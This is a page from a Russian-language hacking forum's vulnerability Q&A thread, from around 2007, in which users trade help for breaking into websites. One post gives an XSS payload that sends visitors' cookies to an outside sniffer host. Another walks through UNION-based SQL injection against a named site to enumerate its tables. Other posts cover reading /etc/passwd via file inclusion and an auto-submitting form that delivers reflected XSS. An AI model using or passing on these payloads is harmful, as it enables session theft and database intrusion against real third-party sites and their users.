HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 8 из 2422 « Первая < 4 5 6 7 8 9 10 11 12 18581085081008 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 07.04.2008, 22:11
lolman
Новичок
Регистрация: 02.04.2008
Сообщений: 7
Провел на форуме:
64303

Репутация: 0
Question
Вобщем есть сервер с мускулем. Знаю Mysql юзера и пароль. Но не могу найти phpmyadmin или что-либо аналогичное. Точнее нашел, но когда набираю www.site.com/phpmyadmin/, то говорит что доступа нет. Вытекает вопрос: Как подключится к базе, точнее чем?
 
Ответить с цитированием

  #2  
Старый 17.08.2007, 01:39
Basurman
Постоянный
Регистрация: 10.11.2006
Сообщений: 416
Провел на форуме:
5636868

Репутация: 849
Отправить сообщение для Basurman с помощью ICQ
По умолчанию
Taylorith, там не sql, там просто файлом secure.log тебе запрещено изменять. и все
SQL inj появляется тогда, когда написано что sql error... и то не всегда

Nazaret2005
<script>img = new Image(); img.src = "http://site.ru/sniffer/lol.jpg?"+document.cookie;</script>
?
Последний раз редактировалось Basurman; 17.08.2007 в 01:42..
 
Ответить с цитированием

  #3  
Старый 17.08.2007, 11:54
Taylorith
Участник форума
Регистрация: 06.09.2006
Сообщений: 177
Провел на форуме:
284125

Репутация: 16
По умолчанию
Цитата:
Сообщение от Basurman  
Taylorith, там не sql, там просто файлом secure.log тебе запрещено изменять. и все
SQL inj появляется тогда, когда написано что sql error... и то не всегда
я понял что это не скуль инъекция, ))) мне интересно может мона ьулдет заюзать как нить php инклуд или что то еще,не зря же ошибька выдается.
 
Ответить с цитированием

  #4  
Старый 17.08.2007, 01:43
Nazaret2005
Новичок
Регистрация: 11.08.2007
Сообщений: 25
Провел на форуме:
131466

Репутация: 11
По умолчанию
Basurman - Я же написал,что html и прочерки не возможны... По этому не получается...

P.S

вот так у него построино.
PHP код:
function comment($text$strip_html true) {
 $s $text;
 $s str_replace(";)"":wink:"$s);
 if ($strip_html)
 $s htmlspecialchars_uni($s);
 $bb[] = "#\[img\]([^?](?:[^\[]+|\[(?!url))*?)\[/img\]#i";
 $html[] = "<img class=\"linked-image\" src=\"\\1\" border=\"0\" alt=\"\\1\" title=\"\\1\" />";
 $bb[] = "#\[img=([a-zA-Z]+)\]([^?](?:[^\[]+|\[(?!url))*?)\[/img\]#is";
 $html[] = "<img class=\"linked-image\" src=\"\\2\" align=\"\\1\" border=\"0\" alt=\"\\2\" title=\"\\2\" />";
 $bb[] = "#\[img\ alt=([a-zA-Zа-яА-Я0-9\_\-\. ]+)\]([^?](?:[^\[]+|\[(?!url))*?)\[/img\]#is";
 $html[] = "<img class=\"linked-image\" src=\"\\2\" align=\"\\1\" border=\"0\" alt=\"\\1\" title=\"\\1\" />";
 $bb[] = "#\[img=([a-zA-Z]+) alt=([a-zA-Zа-яА-Я0-9\_\-\. ]+)\]([^?](?:[^\[]+|\[(?!url))*?)\[/img\]#is";
 $html[] = "<img class=\"linked-image\" src=\"\\3\" align=\"\\1\" border=\"0\" alt=\"\\2\" title=\"\\2\" />";
 $s preg_replace($bb$html$s);
 return $s;

ну а это выводит результат
PHP код:
" . comment($member["info"]) . " 
Последний раз редактировалось Nazaret2005; 17.08.2007 в 02:04..
 
Ответить с цитированием

  #5  
Старый 17.08.2007, 23:35
cheb
Познающий
Регистрация: 31.07.2006
Сообщений: 46
Провел на форуме:
596615

Репутация: 18
По умолчанию
вот нашел я локальний инклуд http://www.polarion.org/index.php?page=
и чегото никак не получается прочитать etc/passwd
Как ето там реализировать )
 
Ответить с цитированием

  #6  
Старый 19.08.2007, 16:10
Qwertison
Познающий
Регистрация: 01.04.2007
Сообщений: 43
Провел на форуме:
297955

Репутация: -5
По умолчанию
Вот SQL-inj _http://mir-tech.ru/select.php?cat=2&categ=2&l=0&cat_num=25&mess=-1
Можете мне обьяснить дураку, ато я никак не пойму как подбирать количество столбцов и их названия?
 
Ответить с цитированием

  #7  
Старый 19.08.2007, 20:50
Taylorith
Участник форума
Регистрация: 06.09.2006
Сообщений: 177
Провел на форуме:
284125

Репутация: 16
По умолчанию
все очень просто , во первых лучшеб былоб если ты в эжтой переменной провел бы скуль, http://mir-tech.ru/group.php?cat= так как она самая такая доступная... ) я покажу именно на ней ) впринципе там во всех переменных возможна скуль)))) ну да алдно
первым делом делаешь следующее
http://mir-tech.ru/group.php?cat=-1+order+by+10/* он выдаст ошибку значит столбцов меньше 10 ))
http://mir-tech.ru/group.php?cat=-1+order+by+5/* снова ошибка значит меньше 5 и так далее мы дойдем до того что столбцов меньше 2 )) отсюда следует что столбов 1 )) 1 столбец ))
http://mir-tech.ru/group.php?cat=-1+union+select+1/*
вот выдал тебе единичку )) далее чстобы узнать версию

http://mir-tech.ru/group.php?cat=-1+union+select+version()/*

5.0.41-log )) вот она легко ломается ))
если что непонятно первым делом сюда ) http://forum.antichat.ru/thread43966.html
)) а так можешь потсучаться в асю 896353 )


http://mir-tech.ru/group.php?cat=-5+union+select+table_name+from+information_schema. tables+limit+3,1/*
таким образом перебираешь таблицы ))
вместо 3 можешь вставить к примеру 1 тад будет превая таблица ) 2 будет вторая )) +) и т.д )
Последний раз редактировалось Taylorith; 19.08.2007 в 20:54..
 
Ответить с цитированием

  #8  
Старый 21.08.2007, 01:23
cheb
Познающий
Регистрация: 31.07.2006
Сообщений: 46
Провел на форуме:
596615

Репутация: 18
По умолчанию
Всем доброй ночи. У меня как обыно появился глупый вопрос. Вообще суть такая, нашел я пасивную хсс, в поиске на одном сайте. но, я никак не могу потделать ссилку со своим запросом, так как ссилка после поиска имеет вид http://site.com/search/ . и все, тишина... Не смогу же я заставить человека вбить в поиск мой скрипт. Кто скажет как мне замутить ссылку чтобы все исполнялось по красоте?
Спасибо.
 
Ответить с цитированием

  #9  
Старый 21.08.2007, 12:24
V1k
Познающий
Регистрация: 01.02.2007
Сообщений: 41
Провел на форуме:
1718137

Репутация: 201
По умолчанию
попробуй изменить метод отправки формы на get.
если не даст результата, тебе нужно будет заманивать человека на свою страницу, примерно такого содержания:
Код:
<form method=post action=http://example.com/ id=form1 >
<input name=search value='"><script>alert()</script>'/>
</form>
<script for=form1 event=load >form1.submit()</script>
где action для формы и name для input ввозьмешь с уязвимого сайта.
Последний раз редактировалось V1k; 21.08.2007 в 14:01..
 
Ответить с цитированием

  #10  
Старый 21.08.2007, 13:23
Ponchik
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
Провел на форуме:
6828219

Репутация: 2274


По умолчанию
У меня вопрос по MSSQL
Есть сайт, на нём есть inj, стоит MSSQL. Мне нужно выбить имена таблиц, но на страницу ответы из запросов не выводятся... Тоесть я пишу UNION SELECT 1,2-- он выводит пустую страницу, тоесть всё ОК! В если напишу UNION SELECT 1,2,3
Выводит
Microsoft OLE DB Provider for SQL Server error '80040e14'
All queries combined using a UNION, INTERSECT or EXCEPT operator must have an equal number of expressions in their target lists.

Тоесть он показывает ошибку!
Вопрос: Нельзя как-нибудь задать запрос, чтобы ответ вывелся как ошибка?
 
Ответить с цитированием
Ответ
Страница 8 из 2422 « Первая < 4 5 6 7 8 9 10 11 12 18581085081008 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ